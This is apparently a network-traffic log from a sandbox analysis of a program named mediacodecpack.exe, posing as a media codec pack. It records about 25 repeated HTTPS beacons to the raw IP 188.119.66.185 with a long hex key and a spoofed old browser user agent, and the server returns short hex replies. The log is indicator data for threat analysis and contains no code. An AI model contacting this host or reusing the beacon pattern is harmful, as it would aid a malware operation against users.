2024-12-18 20:09:06 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:07 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:07 UTC | 24 | IN | Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49712 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:08 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:09 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:09 UTC | 666 | IN | Data Ascii: 28e8b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49714 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:11 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:11 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:11 UTC | 24 | IN | Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49715 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:13 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:14 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:14 UTC | 24 | IN | Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49716 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:15 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:16 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:16 UTC | 24 | IN | Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49718 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:18 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:19 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:19 UTC | 24 | IN | Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49724 | 188.119.66.185 | 443 | 2216 | C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:20 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:21 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:21 UTC | 24 | IN | Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.849730188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:23 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:23 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:23 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.849736188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:25 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:26 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:26 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.849742188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:27 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:28 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:28 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.849748188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:29 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:30 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:30 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.849753188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:32 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:32 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:32 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.849759188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:34 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:35 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:35 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.849765188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:36 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:37 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:37 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.849771188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:39 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:39 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:39 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.849778188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:41 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:42 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:42 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.849784188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:43 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:44 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:44 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.849790188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:46 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:46 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:46 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:46 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.849796188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:48 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:49 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:48 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:49 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.849799188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:50 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:51 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:51 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:51 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.849807188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:53 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:53 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:53 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:53 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


Session ID: 22
Source IP: 192.168.2.8
Source Port: 49814
Destination IP: 188.119.66.185
Destination Port: 443
PID: 2216
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:55 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:56 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:56 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


Session ID: 23
Source IP: 192.168.2.8
Source Port: 49820
Destination IP: 188.119.66.185
Destination Port: 443
PID: 2216
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:09:57 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:09:58 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:09:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:09:58 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


Session ID: 24
Source IP: 192.168.2.8
Source Port: 49825
Destination IP: 188.119.66.185
Destination Port: 443
PID: 2216
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:10:00 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-18 20:10:01 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 18 Dec 2024 20:10:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-18 20:10:01 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


Session ID: 25
Source IP: 192.168.2.8
Source Port: 49831
Destination IP: 188.119.66.185
Destination Port: 443
PID: 2216
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:10:02 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
